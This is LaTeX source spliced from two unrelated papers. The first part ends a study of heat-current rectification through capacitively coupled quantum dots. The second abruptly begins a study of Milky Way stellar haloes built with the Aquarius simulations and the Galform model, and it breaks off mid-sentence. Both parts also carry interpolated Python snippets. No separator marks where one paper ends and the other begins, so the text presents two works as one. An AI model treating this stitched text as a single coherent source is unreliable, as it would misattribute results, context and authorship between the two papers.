For regions of parameters where the rectification is important,
the largest magnitude of the thermal current is obtained when the level nearest to the Fermi
energy is next to the cold lead. This is consistent with the results for the atomic limit presented above.
The behavior of $\mathcal{R}$ as a function of both energy levels is quite similar to the one found within the atomic limit.
In the top panel of Fig. \ref{recnca}, the line $E_L=E_R$ with $\mathcal{R}=0$ is clearly visible and a piece of a curved line with zero rectification also appears. Due to the infinite value of the Coulomb repulsion, the line $E_R=-U-E_L$ with $\mathcal{R}=0$, is not accessible.
\begin{figure}[h!]
\begin{center}
\includegraphics[clip,width=\columnwidth]{mapa_nca_DT2.5_T1.eps}
\includegraphics[clip,width=\columnwidth]{rectif_NCA_EL-10.0_ER1.5_TR1.eps}
\caption{(Color online) Top panel: rectification coefficient calculated with NCA
in the $U \rightarrow \infty$ limit
as a function of both energy levels, for $\Delta T=2.5\Gamma$ and $T_R=\Gamma$. Bottom panel:
Thermal currents as a function of $\Delta T$ for $T_R=0$, $\Gamma_L=\Gamma_R=\Gamma $, $U=\infty$
and full line $E_L=-10 \Gamma$, $E_R=+1.5\Gamma$ (level nearest to the Fermi energy next to the cold lead), dashed line $E_L=+1.5\Gamma$, $E_R=-10\Gamma$ (level nearest to the Fermi energy next to the hot lead). }
\label{recnca}
\end{center}
\end{figure}
Furthermore, the individual currents in both directions, $J_{+}$ and $J_{-}$, display a similar dependence on $\Delta T$ as in the previous case (see the bottom panel of Fig. \ref{recnca}).
However, the maximum ratio $J_+/J_-$ is reduced from 160 to 16. This is due to the fact that
the exponentially small occupancies of some states, which arise for $\Gamma_\nu \rightarrow 0$,
are washed out at finite $\Gamma_\nu$.
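To quantify this asymmetry, the ratios quoted here can be converted into a normalized rectification coefficient. The sketch below assumes the common convention $\mathcal{R}=(J_{+}-J_{-})/(J_{+}+J_{-})$, which vanishes when the two currents are equal, consistent with the zero-rectification lines discussed above; this particular normalization is an assumption for illustration and not necessarily the exact definition used earlier in the text.

```python
def rectification(j_plus, j_minus):
    """Normalized rectification coefficient.

    The convention R = (J+ - J-) / (J+ + J-) is assumed here for
    illustration; it vanishes when the heat current has the same
    magnitude in both directions (e.g. along the line E_L = E_R).
    """
    return (j_plus - j_minus) / (j_plus + j_minus)

# Ratios quoted in the text: J+/J- ~ 160 (atomic limit) and ~ 16 (NCA).
# In this convention both correspond to strong, but not perfect,
# rectification (R = 1 would mean current flows in one direction only).
```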
\section{Summary and discussion}
\label{sum}
We have studied the thermal current through a system of two capacitively coupled quantum dots
connected in series with two conducting leads in the spinless case (corresponding to a high
applied magnetic field). The system is also equivalent to a molecular quantum dot
with two relevant levels connected to the leads in such a way that there is perfect destructive interference in the spinless case, and to one spinful dot between two
conducting leads fully spin polarized in opposite directions. We expect that our main qualitative results are valid when the spin is included in the former two cases.
An interesting feature of the system is that charge transport is not possible, but heat transport is, due to the effect of the Coulomb repulsion between the electrons in the dots,
leading to a strong violation of the Wiedemann-Franz law. A simple picture of the effect of
the Coulomb repulsion in the heat transport is provided in Section \ref{pict}.
The system has been studied previously in the regime of high temperatures of both leads \cite{ruoko,yada}
(including also the full counting statistics \cite{yada}). We extend those results
in the limit of small coupling to the leads for arbitrary values of the other parameters. We analyze exhaustively the different regimes of this system, considering all temperatures and couplings between dots and reservoirs.
In particular, we address the Kondo regime, in which one particle is strongly localized in the double dot but fluctuates between both dots.
For high temperatures of the leads,
our results agree in general with the previous ones, confirming that the heat current displays
a non-monotonic behavior as a function of Coulomb repulsion and/or coupling to the leads, with a maximum at intermediate values.
For temperatures $T$ well below the Kondo energy scale $T_K$, we find that the thermal
conductance is proportional to $T^4$ and the heat current is proportional to $\Delta T^4$,
where $\Delta T$ is the difference between the temperatures of both reservoirs.
In both cases the behavior changes to linear for $T, \Delta T > T_K$. This implies an important enhancement of the thermal response at low temperatures,
in relation to the case where the coupling between the quantum dots and the reservoirs is very small, where the thermal response is exponentially small.
This property is relevant for the implementation of energy harvesting mechanisms at low temperatures.
As a function of Coulomb repulsion $U$, for high $\Delta T$ and small temperature of the cold lead, the heat current has a maximum for $U \sim 3 \Delta T$ and decreases with increasing $U$.
For infinite $U$, we find that the heat current is finite for all non-zero values of
$\Delta T$ and finite values of the energy levels of the dots $E_\nu$.
Within the Kondo regime, this result can be understood in the framework of renormalized perturbation theory: near the Fermi energy, the main aspects of the physics can be described in terms of dressed, weakly interacting quasiparticles. Even if the bare Coulomb repulsion $U \rightarrow \infty$,
the renormalized one $\widetilde{U}$ is small and comparable with the renormalized
coupling to the leads. Nevertheless, even at temperatures several orders of magnitude larger
than $T_K$, for which the Kondo effect is destroyed, we obtain a non-zero heat current
for infinite Coulomb repulsion, if $E_\nu$ remains finite.
Instead, in the symmetric case $E_\nu=-U/2$, the current vanishes for $U \rightarrow \infty$.
When the energy levels $E_\nu$ or the couplings to the leads $\Gamma_\nu$ are different,
the system loses its reflection parity through the plane containing the midpoint between the dots; therefore, one expects the absolute value of the heat current $J_Q$ to differ for positive and negative temperature difference $\Delta T$, which means that the device has some rectifying properties. In the case in which
only the thermal gradient breaks inversion symmetry, one has $J_Q(-\Delta T)=-J_Q(\Delta T)$.
Our results suggest that an asymmetry in the couplings, $\Gamma_L \neq \Gamma_R$, modifies the
amplitude of the current but has little effect on the rectifying properties. Instead, when
$E_L \neq E_R$, a factor larger than ten between the current flowing in opposite senses can be
obtained. Our results indicate that the rectification is largest when one level is above and
near the Fermi energy and the other below the Fermi energy. The largest magnitude of the thermal current is obtained when the former is next to the cold lead.
It is possible that this effect might be increased by adding more dots in series.
\section*{Acknowledgments}
We thank Rafael S\'anchez and H. K. Yadalam for helpful discussions.
We are supported by PIP 112-201501-00506 of CONICET and PICT 2013-1045, PICT-2017-2726
of the ANPCyT. LA also acknowledges support from
PIP- RD 20141216-4905 of CONICET, CNR-CONICET, and PICT-2014-2049 from Argentina, as well as the Alexander von Humboldt Foundation, Germany.
\label{sec:introduction}
An extended and diffuse stellar halo envelops the Milky Way. Although
only an extremely small fraction of the stars in the Solar
neighbourhood belong to this halo, they can be easily recognized by
their extreme kinematics and metallicities. Stellar populations with
these properties can now be followed to distances in excess of
100~kpc using luminous tracers such as RR Lyraes, blue horizontal
branch stars, metal-poor giants and globular clusters
(e.g. Oort 1926; Baade 1944; Eggen, Lynden-Bell \& Sandage 1962; Searle \& Zinn 1978; Yanny {et~al.} 2000; Vivas \& Zinn 2006; Morrison {et~al.} 2009).
In recent years, large samples of halo-star velocities
(e.g. Morrison {et~al.} 2000; Starkenburg {et~al.} 2009) \newt{and}
`tomographic' photometric and spectroscopic surveys have shown that
the stellar halo is not a single smoothly-distributed entity, but
instead a superposition of many components
(Belokurov {et~al.} 2006; Juri{\'c} {et~al.} 2008; Bell {et~al.} 2008; Carollo {et~al.} 2007, 2009; Yanny {et~al.} 2009). Notable
substructures in the Milky Way halo include the broad stream of stars
from the disrupting Sagittarius dwarf galaxy
(Ibata, Gilmore \& Irwin 1994; Ibata {et~al.} 2001), extensive and diffuse overdensities
(Juri{\'c} {et~al.} 2008; Belokurov {et~al.} 2007a; Watkins {et~al.} 2009), the Monoceros
`ring' (Newberg {et~al.} 2002; Ibata {et~al.} 2003; Yanny {et~al.} 2003), the orphan stream
(Belokurov {et~al.} 2007b) and other kinematically cold debris
(Schlaufman {et~al.} 2009). Many of these features remain unclear. At
least two kinematically distinct `smooth' halo components have been
identified from the motions of stars in the Solar neighbourhood, in
addition to one or more `thick disc' components
(Carollo {et~al.} 2009). Although current observations only hint at
the gross properties of the halo and its substructures, some general
properties are well-established: the halo is extensive
($>100\:\rm{kpc}$), metal-poor
($\mathrm{\langle[Fe/H]\rangle\sim{-1.6}}$,
e.g. Laird {et~al.} 1988; Carollo {et~al.} 2009) and contains of the order
of 0.1-1\% of the total stellar mass of the Milky Way
\newt{(recent reviews
include Freeman \& Bland-Hawthorn 2002; Helmi 2008)}.
Low surface-brightness features seen in projection around other galaxies
aid in the interpretation of the Milky Way's stellar halo, and vice
versa. Diffuse concentric `shells' of stars on $100$~kpc scales around
otherwise regular elliptical galaxies \newt{have been} attributed to
accretion events (e.g. Schweizer 1980; Quinn 1984). Recent surveys of
M31 (e.g. Ferguson {et~al.} 2002; Kalirai {et~al.} 2006; Ibata {et~al.} 2007; McConnachie {et~al.} 2009) have
revealed an extensive halo (to $\sim150\,\rm{kpc}$) also displaying
abundant substructure. The surroundings of other nearby Milky Way
analogues are now being targeted by observations using
resolved star counts to reach very low effective surface brightness
limits, although as yet no systematic survey has been carried out to
sufficient depth
(e.g. Zibetti \& Ferguson 2004; McConnachie {et~al.} 2006; de~Jong, Radburn-Smith \& Sick 2008; Barker {et~al.} 2009; Ibata, Mouhcine, \& Rejkuba 2009).
A handful of deep observations beyond the Local Group suggest that
stellar haloes are ubiquitous and diverse
(e.g. Sackett {et~al.} 1994; Shang {et~al.} 1998; Malin \& Hadley 1999; Mart{\'{i}}nez-Delgado {et~al.} 2008, 2009; Fa{\'{u}}ndez-Abans {et~al.} 2009).
Stellar haloes formed from the debris of disrupted satellites are a
natural byproduct of hierarchical galaxy formation in the \lcdm{}
cosmology\footnote{In addition to forming components of the accreted
stellar halo, infalling satellites may cause dynamical heating of a
thin disc formed `in situ'
(e.g. Toth \& Ostriker 1992; Velazquez \& White 1999; Benson {et~al.} 2004; Kazantzidis {et~al.} 2008) and may
also contribute material to an accreted thick disc (Abadi, Navarro \& Steinmetz 2006)
or central bulge. We discuss these additional contributions to the
halo, some of which are not included in our modelling, in
\mnsec{sec:defining_haloes}}. The entire assembly history of a
galaxy may be encoded in the kinematics, metallicities, ages and
spatial distributions of its halo stars. Even though these stars
constitute a very small fraction of the total stellar mass, the
prospects are good for recovering such information from the haloes of
the Milky Way, M31 and even galaxies beyond the Local Group
(e.g. Johnston, Hernquist \& Bolte 1996; Helmi \& White 1999). In this context, theoretical
models can provide useful `blueprints' for interpreting the great
diversity of stellar haloes and their various sub-components, and for
relating these components to fundamental properties of galaxy
formation models. Alongside idealised models of tidal disruption,
\textit{ab initio} stellar halo simulations in realistic cosmological
settings are essential for \newt{direct} comparison with observational
data.
In principle, hydrodynamical simulations are well-suited to this task,
as they incorporate the dynamics of a baryonic component
self-consistently. However, many uncertainties remain in how physical
processes such as star formation and supernova feedback, which act
below the scale of individual particles or cells, are implemented in
these simulations. The computational cost of a single state-of-the-art
hydrodynamical simulation is extremely high. This cost severely limits
the number of simulations that can be performed, restricting the
freedom to explore different parameter choices or alternative
assumptions within a particular model. The computational demands of
hydrodynamical simulations are compounded in the case of stellar halo
models, in which the stars of interest constitute only $\sim1\%$ of
the total stellar mass of a Milky Way-like galaxy. Even resolving the
accreted dwarf satellites in which a significant proportion of these
halo stars may originate is close to the limit of current simulations
of disc galaxy formation. To date, few hydrodynamical simulations have
focused explicitly on the accreted stellar halo (recent examples
include Bekki \& Chiba 2001; Brook {et~al.} 2004; Abadi {et~al.} 2006 and
Zolotov {et~al.} 2009).
In the wider context of simulating the `universal' population of
galaxies in representative ($\gtrsim100\,\rm{Mpc^{3}}$) cosmological
volumes, these practical limitations of hydrodynamical simulations have
motivated the development of a powerful and highly successful
alternative, which combines two distinct modelling techniques:
well-understood high-resolution N-body simulations of large-scale
structure evolved self-consistently from \lcdm{} initial conditions and
fast, adaptable semi-analytic models of galaxy formation with very low
computational cost per run
(Kauffmann, Nusser \& Steinmetz 1997; Kauffmann {et~al.} 1999; Springel {et~al.} 2001; Hatton {et~al.} 2003; Kang {et~al.} 2005; Springel {et~al.} 2005; Bower {et~al.} 2006; Croton {et~al.} 2006; De~Lucia {et~al.} 2006). In
this paper we describe a technique motivated by this approach which
exploits computationally expensive, ultra-high-resolution N-body
simulations of \textit{individual} dark matter haloes by combining them
with semi-analytic models of galaxy formation. Since our aim is to study
the spatial and kinematic properties of stellar haloes formed through
the tidal disruption of satellite galaxies, our technique goes beyond
standard semi-analytic treatments.
The key feature of the method presented here is the dynamical
association of stellar populations (predicted by the semi-analytic
component of the model) with sets of \textit{individual particles} in
the N-body component. We will refer to this technique as `particle
tagging'. We show how it can be applied by combining the Aquarius suite
of six \newt{high resolution} isolated $\sim10^{12}\,\rm{M_{\sun}}$ dark
matter haloes (Springel {et~al.} 2008a,b) with the
\galform{} semi-analytic model (Cole {et~al.} 1994, 2000; Bower {et~al.} 2006). These simulations \newt{can resolve structures down to
$\sim10^{6}\rm{M_{\sun}}$, comparable to the least massive dark halo
hosts inferred for Milky Way satellites
(e.g. Strigari {et~al.} 2007; Walker {et~al.} 2009)}.
Previous implementations of \newt{the particle-tagging approach}
\movt{(White \& Springel 2000; Diemand, Madau \& Moore 2005; Moore {et~al.} 2006; Bullock \& Johnston 2005; De~Lucia \& Helmi 2008)} have so
far \newt{relied on cosmological simulations} severely limited by
resolution \newt{(Diemand {et~al.} 2005; De~Lucia \& Helmi 2008) or \newt{else} simplified
\newt{higher resolution} N-body models (Bullock \& Johnston 2005)}. \movt{In the
present paper, \newt{we apply this technique} as a postprocessing
operation to a `fully cosmological' simulation, in which structures have
grown \textit{ab initio}, interacting with one another
self-consistently. \newt{The resolution of our simulations is sufficient
to resolve stellar halo substructure in considerable detail.}}
With the aim of presenting our modelling approach and exploring some
of the principal features of our simulated stellar haloes, we proceed
as follows. In \mnsec{sec:method_overview} we review the Aquarius
simulations and their post-processing with the \galform{} model, and
in \mnsec{sec:buildinghaloes} we describe our method for recovering
the spatial distribution of stellar populations in the halo by tagging
particles. \newt{We calibrate our model by comparing the statistical
properties of the surviving satellite population to observations;
the focus of this paper is on the stellar halo, rather than on the
properties of these satellites.} In \mnsec{sec:results} we
describe our model stellar haloes and compare their structural
properties to observations of the Milky Way and M31. We also examine
the assembly history of the stellar haloes in detail
(\mnsec{sec:assembly}) and explore the relationship between the haloes
and the surviving satellite population. Finally, we summarise our
results in \mnsec{sec:conclusion}.
\section{Aquarius and Galform}
\label{sec:method_overview}
Our model has two key components: the Aquarius suite of six
high-resolution N-body simulations of Milky Way-like dark matter haloes,
and \galform{}, a semi-analytic model of galaxy formation. The technique
of post-processing an N-body simulation with a semi-analytic model is
well established
(Kauffmann {et~al.} 1999; Springel {et~al.} 2001; Helly {et~al.} 2003; Hatton {et~al.} 2003; Kang {et~al.} 2005; Bower {et~al.} 2006; De~Lucia {et~al.} 2006),
although its application to high-resolution simulations of individual
haloes such as Aquarius is novel and we review relevant aspects of the
\galform{} code in this context below.
\newt{Here, i}n the post-processing of the N-body simulation,
the stellar populations predicted by \galform{} to form in each halo
are \newt{also} associated with `tagged' subsets of dark matter
particles. By following these tagged dark matter particles, we track
the evolving \textit{spatial distribution and kinematics} of their associated
stars, in particular those that are stripped from satellites to build
the stellar halo. This level of detail regarding the distribution of
halo stars is unavailable to a standard semi-analytic approach, in
which the structure of each galaxy is represented by a combination of
analytic density profiles.
\newt{Tagging particles in this way
requires} the fundamental assumption that baryonic mass nowhere
dominates the potential and hence does not perturb the collisionless
dynamics of the dark matter. Generally, a massive thin disc is
expected to form at some point in the history of our \newt{`main'}
haloes. Although our semi-analytic model accounts for this thin disc
consistently, our dark matter tagging scheme cannot represent its
dynamics. For this reason, and also to avoid
confusion with our accreted halo stars, we do
not attempt to tag dark matter to represent stars forming in situ in a
thin disc at the centre of the main halo. \newt{T}he approximation \newt{that} the dynamics
of stars can be fairly represented by tagging dark matter
particles is justifiable for systems with high mass-to-light
ratios such as the dwarf satellites of the Milky Way and M31
\movt{(e.g. Simon \& Geha 2007; Walker {et~al.} 2009)}, the units from which
stellar haloes are assembled in our models.
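The tagging scheme itself is specified in \mnsec{sec:buildinghaloes}; purely as an illustration of the general idea of `particle tagging', the sketch below assigns a newly formed stellar population to the most-bound fraction of the dark matter particles of its host subhalo. The fraction f_mb and the equal mass weighting are illustrative assumptions, not the calibrated choices of the model.

```python
import numpy as np

def tag_most_bound(binding_energy, stellar_mass, f_mb=0.01):
    """Tag the f_mb most-bound particles of a subhalo with a newly
    formed stellar population, sharing the stellar mass equally.

    f_mb and the equal weighting are illustrative assumptions; the
    actual selection is part of the model described in the text.
    """
    energy = np.asarray(binding_energy)
    n_tag = max(1, int(f_mb * energy.size))
    tagged = np.argsort(energy)[:n_tag]        # most bound = lowest energy
    weights = np.full(n_tag, stellar_mass / n_tag)
    return tagged, weights
```

Once tagged, the particles (and hence their associated stars) are simply followed through the N-body simulation, whether they remain bound to the satellite or are tidally stripped into the halo.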
\subsection{The Aquarius Haloes}
\label{sec:aquarius}
Aquarius (Springel {et~al.} 2008a) is a suite of high-resolution
simulations of six dark matter haloes having masses within the range
$1-2\times10^{12}\,\rm{M_{\sun}}$, comparable to values typically
inferred for the Milky Way halo
(e.g. Battaglia {et~al.} 2005; Smith {et~al.} 2007; Li \& White 2008; Xue {et~al.} 2008). By matching the
abundance of dark matter haloes in the Millennium simulation to the SDSS
stellar mass function, Guo {et~al.} (2009) find
$2.0\times10^{12}\,\rm{M_{\sun}}$ (with a 10-90\% range of
$0.8\times10^{12}\rm{M_{\sun}}$ to
$4.7\times10^{12}\rm{M_{\sun}}$). This value is sensitive to the
assumption that the Milky Way is a typical galaxy, and to the adopted
Milky Way stellar mass ($5.5\times10^{10}\,\rm{M_{\sun}}$;
Flynn {et~al.} 2006).
\newt{The Aquarius haloes were selected from a lower resolution version of the
Millennium-II simulation (Boylan-Kolchin {et~al.} 2009) and individually
resimulated using a multi-mass particle (`zoom') technique. In this
paper we use the `level 2' Aquarius simulations, the highest level
at which all six haloes were simulated.} We refer the reader to
Springel {et~al.} (2008a,b) for a comprehensive account
of the entire simulation suite and demonstrations of numerical
convergence. We list relevant properties of each halo/simulation in
\mntab{tbl:aquarius}. The simulations were carried out with the
parallel Tree-PM code \gadgetthree{}, an updated version of
\gadgettwo{} (Springel 2005). The Aq-2 simulations used a
fixed comoving Plummer-equivalent gravitational softening length of
$\epsilon = 48\:h^{{-}1} \:\rm{pc}$. \lcdm{} cosmological parameters
were adopted as $\Omega_{\rm{m}} = 0.25$, $\Omega_{\Lambda} = 0.75$,
$\sigma_{8} = 0.9$, $n_{\rm{s}} = 1$, and Hubble constant $H_{0} =
100h \,\rm{km\,s}^{{-}1}\rm{Mpc}^{-1}$. A value of $h = 0.73$ is
assumed throughout this paper. These parameters are identical to those
used in the Millennium Simulation and are marginally
consistent with WMAP 1- and 5-year constraints
(Spergel {et~al.} 2003; Komatsu {et~al.} 2009).
\begin{table}
\caption{Properties of the six Aquarius dark matter halo
simulations (Springel {et~al.} 2008a) on which the models in this
paper are based. The first column labels the simulation
(abbreviated from Aq-A-2, Aq-B-2, etc.). From left to
right, the remaining columns give the particle mass,
$m_{\rm{p}}$; the number of particles within the virial radius,
$N_{200}$; the virial mass of the halo, $M_{200}$; the virial
radius at $z=0$, $r_{200}$; and the maximum circular velocity,
$V_{\rm{max}}$, and the corresponding
radius, $r_{\rm{max}}$. Virial radii are defined as the radius
of a sphere with mean inner density equal to 200 times the
critical density for closure.}
\begin{tabular}{@{}lcccccc}
\hline
& $m_{\rm{p}}$ & $N_{200}$ & $M_{200}$ & $r_{200}$ & $V_{\rm{max}}$ & $r_{\rm{max}}$ \\
& $[10^{3}\rm{M_{\sun}}]$ & $[10^{6}]$ & $[10^{12}\rm{M_{\sun}}]$ & $[\rm{kpc}]$ & $[\rm{km}\,\rm{s}^{{-1}}]$ & $[\rm{kpc}]$ \\
\hline
A &$13.70$ & 135 & $1.84$& 246 & 209 & 28 \\
B &$6.447$ & 127 & $0.82$& 188 & 158 & 40 \\
C &$13.99$ & 127 & $1.77$& 243 & 222 & 33 \\
D &$13.97$ & 127 & $1.74$& 243 & 203 & 54 \\
E &$9.593$ & 124 & $1.19$& 212 & 179 & 56 \\
F &$6.776$ & 167 & $1.14$& 209 & 169 & 43 \\
\hline
\end{tabular}
\label{tbl:aquarius}
\end{table}
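As a consistency check of the definition given in the caption of \mntab{tbl:aquarius}, the virial radius follows from the virial mass via $M_{200}=\frac{4}{3}\pi r_{200}^{3}\cdot 200\rho_{\rm{crit}}$. The sketch below uses the standard value $\rho_{\rm{crit}}=2.775\times10^{11}h^{2}\,\rm{M_{\sun}\,Mpc^{-3}}$ with $h=0.73$ as adopted in the text:

```python
import math

H = 0.73                    # dimensionless Hubble parameter adopted in the text
RHO_CRIT = 2.775e11 * H**2  # critical density today [Msun / Mpc^3]

def r200_kpc(m200_msun):
    """Radius (kpc) of a sphere whose mean enclosed density is 200 * rho_crit."""
    r_mpc = (3.0 * m200_msun / (800.0 * math.pi * RHO_CRIT)) ** (1.0 / 3.0)
    return 1.0e3 * r_mpc  # Mpc -> kpc
```

For example, $M_{200}=1.84\times10^{12}\,\rm{M_{\sun}}$ (Aq-A) gives $r_{200}\simeq246$~kpc and $M_{200}=0.82\times10^{12}\,\rm{M_{\sun}}$ (Aq-B) gives $r_{200}\simeq188$~kpc, reproducing the tabulated radii to within rounding of the quoted masses.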
\subsection{The \galform{} Model}
\label{sec:galform}
N-body simulations of cosmic structure formation supply information on
the growth of dark matter haloes, which can serve as the starting
point for a semi-analytic treatment of baryon accretion, cooling and
star formation (see Baugh 2006, for a comprehensive discussion of the
fundamental principles of semi-analytic
modelling). The Durham semi-analytic model,
\galform{}, is used in this paper to postprocess the Aquarius N-body
simulations. \movt{The \galform{} code is controlled by a number of
interdependent parameters which are constrained in part by
theoretical limits and results from hydrodynamical
simulations. Remaining parameter values are chosen such that the
model satisfies statistical comparisons with several datasets, for
example the galaxy luminosity function measured in several wavebands
(e.g. Baugh {et~al.} 2005; Bower {et~al.} 2006; Font {et~al.} 2008). Such statistical constraints
on large scales do not guarantee that the same model will provide a
good description of the evolution of a single `Milky Way' halo and
its satellites. \movt{A model producing a satellite \newt{galaxy}
luminosity function consistent with observations is a fundamental
prerequisite for the work presented here, in which a proportion of
the total satellite population provides the raw material for the
assembly of stellar haloes.} \newt{W}e demonstrate below that the
key processes driving galaxy formation on small scales are captured
to good approximation by the existing \galform{} model and
parameter values of
Bower {et~al.} (2006).}
Many of the physical processes of greatest relevance to galaxy
formation on small scales were explored within the context of
semi-analytic modelling by Benson {et~al.} (2002b). Of particular
significance are the suppression of baryon accretion and cooling in
low mass haloes as the result of photoheating by a cosmic ionizing
background, and the effect of supernova feedback
in shallow potential wells. Together, these effects constitute a
straightforward astrophysical explanation for the disparity between
the number of low mass dark subhaloes found in N-body simulations of
Milky Way-mass hosts and the far smaller number of luminous satellites
observed around the Milky Way (the so-called `missing satellite'
problem). Recent discoveries of faint dwarf satellites and an improved
understanding of the completeness of the Milky Way sample (Koposov {et~al.} 2008; Tollerud {et~al.} 2008, and
refs. therein) have reduced the deficit of
\textit{observed} satellites, to the point of qualitative agreement
with the prediction of the model of
Benson {et~al.} (2002b). \newt{A}t issue now is the
quality (rather than the lack) of agreement between such models and
the data. \movt{\newt{W}e pay particular attention to the suppressive
effect of photoheating. This is a significant process for shaping
the faint end of the satellite luminosity function when, as we
assume here, the strength of supernova feedback is fixed by
constraints on the galaxy population as a whole.}
\subsubsection{Reionization and the satellite luminosity function}
A simple model of reionization heating based on a halo mass dependent
cooling threshold (Benson {et~al.} 2003) is implemented in the
Bower {et~al.} (2006) model of \galform{}. This threshold is set by
parameters termed $V_{\rm{cut}}$ and $z_{\rm{cut}}$. No gas is
allowed to cool within haloes having a circular velocity below
$V_{\rm{cut}}$ at redshifts below $z_{\rm{cut}}$. To good
approximation, this scheme reproduces the link between the suppression
of cooling and the evolution of the `filtering mass' (as defined
by Gnedin 2000) found in the more detailed model of
Benson {et~al.} (2002b), where photoheating of the intergalactic medium
was modelled explicitly. In practice, in this simple model, the value
of $V_{\rm{cut}}$ is most important. Variations in $z_{\rm{cut}}$
within plausible bounds have a less significant effect on the $z=0$
luminosity function.
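In this simple scheme the suppression acts as a sharp threshold in circular velocity and redshift. A minimal sketch of the rule, using the $V_{\rm{cut}}=30\,\rm{km\,s^{-1}}$ adopted in the text; the value of $z_{\rm{cut}}$ below is an illustrative placeholder, since (as noted above) the $z=0$ luminosity function is insensitive to plausible variations in $z_{\rm{cut}}$:

```python
def cooling_allowed(v_circ, z, v_cut=30.0, z_cut=6.0):
    """Benson et al. (2003)-style reionization cut: no gas cools in a
    halo with circular velocity below v_cut (km/s) once z < z_cut.

    v_cut = 30 km/s follows the text; z_cut = 6 is an illustrative
    placeholder, not a value quoted in the text.
    """
    return z >= z_cut or v_circ >= v_cut
```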
As stated above, we adopt as a fiducial model the \galform{}
implementation and parameters of Bower {et~al.} (2006). However, we make a
single parameter change, lowering the value of $V_{\rm{cut}}$ from
$50\,\rm{km\,s^{-1}}$ to $30\,{\rm{km\,s^{-1}}}$. This choice is
motivated by recent \textit{ab initio} cosmological galaxy formation
simulations incorporating the effects of photoionization
self-consistently (Hoeft {et~al.} 2006; Okamoto, Gao \& Theuns 2008; Okamoto \& Frenk 2009; Okamoto {et~al.} 2009). These studies find that values of
$V_{\rm{cut}}\sim25-35\,\rm{km\,s^{-1}}$ are preferable to the higher
value suggested by the results of Gnedin (2000) and adopted in
previous semi-analytic models
(e.g. Somerville 2002; Bower {et~al.} 2006; Croton {et~al.} 2006; Li, De~Lucia \& Helmi 2009a). \newt{Altering
this value affects only the very faint end of the galaxy luminosity
function, and so does not change the results of Bower {et~al.} (2006).}
\movt{The choice of a fiducial set of semi-analytic parameters in this
paper \newt{illustrates} the flexibility
\newt{of} our approach to modelling stellar
haloes. The N-body component of our models -- Aquarius -- represents
a considerable investment of computational time. In contrast, the
semi-analytic post-processing can be re-run in only a few hours, and
can be easily `upgraded' (by adding physical processes and
constraints) in order to provide more detailed output, explore the
consequences of parameter variations, or compare alternative
semi-analytic models.}
The \textit{V}-band satellite luminosity function resulting from the
application of the \galform{} model described above to each Aquarius
halo is shown in \fig{fig:galform_lf}. Satellites are defined as all
galaxies within a radius of 280 kpc from the centre of potential in
the principal halo, equivalent to the limiting distance of the
Koposov {et~al.} (2008) completeness-corrected observational sample. These
luminosity functions are measured from the \textit{particle}
realisations of satellites that we describe in the following section,
and not directly from the semi-analytic model. They therefore account
for the effects of tidal stripping, although these are minor: the
fraction of satellites brighter than $M_{\rm{V}}=-10$ is reduced very
slightly in some of the haloes. In agreement with the findings of
Benson {et~al.} (2002a), the model matches the faint end of the
luminosity function well, but fewer bright satellites are found in
each of our six models than are observed in the mean of the Milky Way
+ M31 system, although the number of objects concerned is small. The
true abundance of bright satellites for Milky Way-mass hosts is poorly
constrained at present, so it is unclear whether or not this
discrepancy reflects cosmic variance, a disparity in mass between the
Aquarius haloes and the Milky Way halo, or a shortcoming of our
fiducial Bower {et~al.} (2006) model. A modification of this model in which
the tidal stripping of hot gas coronae around infalling satellites is
explicitly calculated (rather than assuming instantaneous
removal; see Font {et~al.} 2008) produces an acceptable abundance of bright
satellites.
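The cumulative luminosity functions of \fig{fig:galform_lf} amount to rank-ordering by magnitude the satellites that lie within 280~kpc of the halo centre; a minimal sketch (function and variable names are illustrative):

```python
import numpy as np

def cumulative_lf(m_v, r_kpc, r_lim=280.0):
    """Cumulative V-band LF: the number of satellites brighter than
    each magnitude, for galaxies within r_lim (kpc) of the halo centre."""
    m_v = np.asarray(m_v)
    sel = np.sort(m_v[np.asarray(r_kpc) < r_lim])  # brightest (most negative) first
    return sel, np.arange(1, sel.size + 1)
```

The count at the faintest magnitude then equals the total number of contributing satellites quoted in the figure legend.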
\begin{figure}
\includegraphics[width=84mm]{fig1.eps}
\caption{The cumulative \textit{V}-band luminosity functions (LFs) of
satellite galaxies for the six Aquarius haloes, adopting in
\galform{} the parameters of Bower {et~al.} (2006) with $V_{\rm{cut}} =
30\:\rm{km\,s^{-1}}$. These LFs \textit{include} the effects of
tidal stripping measured from our assignment of stars to dark matter
particles (\mnsec{sec:buildinghaloes}), although this makes only a
small difference to the LF from our semi-analytic model alone. All
galaxies within 280~kpc of the halo centre are counted as satellites
(the total number of contributing satellites in each halo is
indicated in the legend). The stepped line (grey, with error bars)
shows the observed mean luminosity function found by
Koposov {et~al.} (2008) for the MW and M31 satellite system (also to
280~kpc), assuming an NFW distribution for satellites in correcting
for SDSS sky coverage and detection efficiency below
$M_{\mathrm{v}}=-10$. The colour-coding of our haloes in this figure
is used throughout.}
\label{fig:galform_lf}
\end{figure}
\subsubsection{Further details}
Within \galform{}, cold gas is transferred from tidally destroyed
satellites to the disc of the central galaxy when their host subhaloes
are no longer identified at the resolution limit imposed by
\subfind{}. In the Aq-2 simulations this corresponds to a minimum
resolved dark halo mass of $\sim3\times10^{5}\rm{M}_{\sun}$. In the
\galform{} model of Bower {et~al.} (2006), which does not include tidal
stripping or a `stellar halo' component, the satellite galaxy is
considered to be fully disrupted (merged) at this point: its stars
are transferred to the bulge component of the central galaxy. By
contrast, our particle representation (described in
\mnsec{sec:buildinghaloes}) allows us to follow the \textit{actual}
fate of the satellite stars independently of this choice in the
semi-analytic model. This choice is therefore largely a matter of
`book-keeping'; we have ensured that adopting this approach does not
prematurely merge galaxies in the semi-analytic model that are still
capable of seeding new stellar populations into the particle
representation. Semi-analytic models based on N-body simulations
often choose to `follow' satellites with dark haloes falling below
the numerical resolution by calculating an appropriate merger
time-scale from the last-known N-body orbital parameters, accounting
for dynamical friction. However, the resolution of Aquarius is
sufficiently high to make a simpler and more self-consistent
approach preferable in this case, preserving the one-to-one
correspondence between star-forming semi-analytic galaxies and bound
objects in the simulation. We have checked that allowing
semi-analytic galaxies to survive without resolved subhaloes,
subject to the treatment of dynamical friction used by
Bower {et~al.} (2006), affects only the faintest ($M_{\mathrm{v}} \sim 0$)
part of the survivor luminosity function. The true nature and
survival of these extremely faint sub-resolution galaxies remains an
interesting issue to be addressed by future semi-analytic models of
galactic satellites.
In \mntab{tbl:summary} (\mnsec{sec:results}) we list the \textit{V}-band
magnitudes and total stellar masses of the central galaxies that form in
the six Aquarius haloes. A wide range is evident, from an M31-analogue
